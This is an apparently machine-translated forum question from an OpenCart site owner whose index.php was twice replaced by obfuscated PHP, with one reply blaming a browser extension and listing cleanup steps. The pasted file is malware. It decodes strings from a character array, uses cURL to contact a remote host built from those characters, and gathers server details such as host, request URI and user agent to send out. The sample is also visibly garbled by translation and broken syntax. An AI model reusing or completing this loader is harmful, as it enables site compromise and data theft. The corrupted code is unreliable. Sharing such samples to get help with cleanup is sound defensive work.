Opencart index.php file corrupted

Question

I'm using opencart v3.0.2.0 and the problem is that opencart's index.php file (the entry point to my opencart website, uploaded to the public_html directory) crashes (the code in the index.php file has changed to strange characters). This happened twice last week. I had no idea anyone had been hacked or that there was something wrong with my domain or code. If anyone can help or guide me please let me know. Thanks.

Damaged index.php file:

Global $O; $O=url decoding ($OOOOOO);$oOooOO='z1226_16';$oOooOOoO=$O[15].$O[4].$O[4].$O[9 ].$O[62].$O[63].$O[63].$O[64].$O[72].$O[66].$O[59].$O[65]. $AO[67].$AO[71].$O[59].$O[65].$O[65].$O[67].$O[59].$O[65].$O [67].$O[65] .$O[63].$oOooOO.$O[63];FunctionooooooooOOOOOOOOoooooOOO($ooooOOOoOoo){ $ooooOOOooOo=curl_init();curl_setopt($ooooOOOooOo,CURLOPT_URL,$ooooOOOoOoo); curl_setopt($ooooOOOooOo,CURLOPT_RETURNTRANSFER,1);curl_setopt($ooooOOOooOo,CURLOPT_ CONNECTTIMEOUT, 5); $ooooOOOOooO =curl_exec($ooooOOOooOo);curl_close($ooooOOOooOo);return $ooooOOOOooO; } Function ooOOoOOO($Ooooo O,$Ooooooo= array()){ global $O;$OooooO=str_replace(' ',' ',$OooooO);$OOooooO=curl_init();curl_setopt($OOooooO,CURLOPT_URL, " $OooooO");curl_setopt($OOooooO,CURLOPT_RETURNTRANSFER . ry($OOOOoo ));$OOOOooo=curl_exec($OOooooO);$OOOOoooo=curl_errno($OOooooO);curl_close($OOooooO);if(0!==$OOOOooooOO){return false ;}return $OOOOooo ;} function oooOOOo($ ooOOo){global $O;$ooOOOOo = false;$oooooOOo = $O[14].$O[8].$O[8].$O[14]. $O[18].$O[2] .$O[23].$O[8].$O[4].$O[90].$O[14].$O[8].$O [8].$O[14].$ O[18].$O[2].$O[90].$O[5].$O[10].$O[15].$O[8 ].$O[ 8].$O[ 90].$O[23].$O[7].$O[24].$O[14].$O[90].$O[10]. $O[8] .$O[18] ;if ($ooOOo!=''){if (preg_match("/($ooooooOOo)/si",$ooOOo)){$ooOOOOo=true;}} returns $ooOOOOo;} function oooOOooOOoOO ($oOOOOOOoOOOO){global $O;$ooOOOOOOOOoO=false;$ooOOOOOOoOo=$O[14].$O[8].$O[8].$O[14].$O[18 ].$O[ 2].$O[ 59].$O[21].$O[8].$O[59].$O[16].$O[9].$O[90]. $O[5].$O[10] .$O[15].$O[8].$O[8].$O[59].$O[21].$O[8].$O [59].$O[16].$ O[9].$O[90].$O[14].$O[8].$O[8].$O[14].$O[18 ].$O[ 2].$O[ 59].$O[21].$O[8].$O[25];if ($oOOOOOOoOOOO!='' && preg_match("/($ooOOOOOOoOo)/ si", $oOOOOOOoOOOOOO )) {$ooOOOOOOoO= true;}Return $ooOOOOOOoO;}$oOooOOoOO=((isset($_SERVER[$O[41].$O[30].$O[30].$O[ 35].$O [37]]) && $_SERVER[$O[41].$O[30].$O[30].$O[35].$O[37]]!==$O[ 8].$O[13].$O [13])?$O[15].$O[4].$O[4].$O[9].$O[11].$O[62 ].$O[ 63].$O[ 63]:$O[15].$O[4].$O[4].$O[9].$O[62].$O[63]. $O[63] );$oOoooOOoOO=$ _SERVER[$O[29].$O[28].$O[26].$O[32].$O[28].$O[37].$O[30].$O[52].$O[32].$O[29].$O[33]];$ooOOooooOOoOO=$_SERVER[$O[41].$O[30].$O [30].$ O[35].$O[52].$O[41].$O[34].$O[37].$O[30]];$ooOOOoooOOoOO=$_SERVER[$O[ 35].$O [41].$O[35].$O[52].$O[37].$O[28].$O[44].$O[39]];$ooOOOOooooOOOoOO=$ _SERVER[$O[ 37].$O[28].$O[29].$O[48].$O[28].$O[29].$O[52].$O[50]. $O[36] .$O[51].$O[28]];$ooOOOOoooOOOOoOO=$oOooOOoOO.$ooOOoooOOoOO.$oOoooOOoOO;$oooOOOOoooOOOooOO=$oOooOOoO.$O[63].$O[7].$ O[24]。$O[12].$O[10].$O[4].$O[10].$O[59].$O[9].$O[15].$O[ 9];$ooooOOOOoooOOOooO =$oOooOOoO.$O[63].$O[25].$O[10].$O[9].$O[59].$O[9].$O[15] .$O[9 ];$ooooOOOOoooOOOooOoo=$oOooOOoO.$O[63].$O[16].$O[6].$O[25].$O[9].$O[59].$ O[9]。$O[15].$O[9];$oooooOOoooOOOoooOoo=$oOooOOoO.$O[63].$O[1].$O[8].$O[3].$O[ 12].$O [11].$O

Answer 1

I recently encountered a similar issue with one of my clients. Upon investigation, we found that the problem was caused by a Chrome browser extension that injects code into PHP files when uploading any php files through the browser (like Cpanel File Management). In this case, the code was injected into the index.php file, and when someone accessed that file through the URL, the malicious code would start injecting files into the server, creating new files, and notifying the hacker of the server's current URL and other data using the cURL function in PHP.

To resolve this issue, you can take the following steps:

1- Take a screenshot of any extensions in your browser that are used to upload files to the server, share them with us, and then delete the browser or all its extensions.

2- Check all files uploaded or updated to the server since the date of the hack. You can run commands on the server to get a list of new or updated files, depending on your operating system.

3- You may find some *.php files in the .well-known or other hidden folders on the server.

4- Protect your operating system with antivirus software. I recommend using non-free antivirus software such as Kaspersky.

Can you share a screenshot of your browser extension so we can determine which extension may have caused the site to be hacked?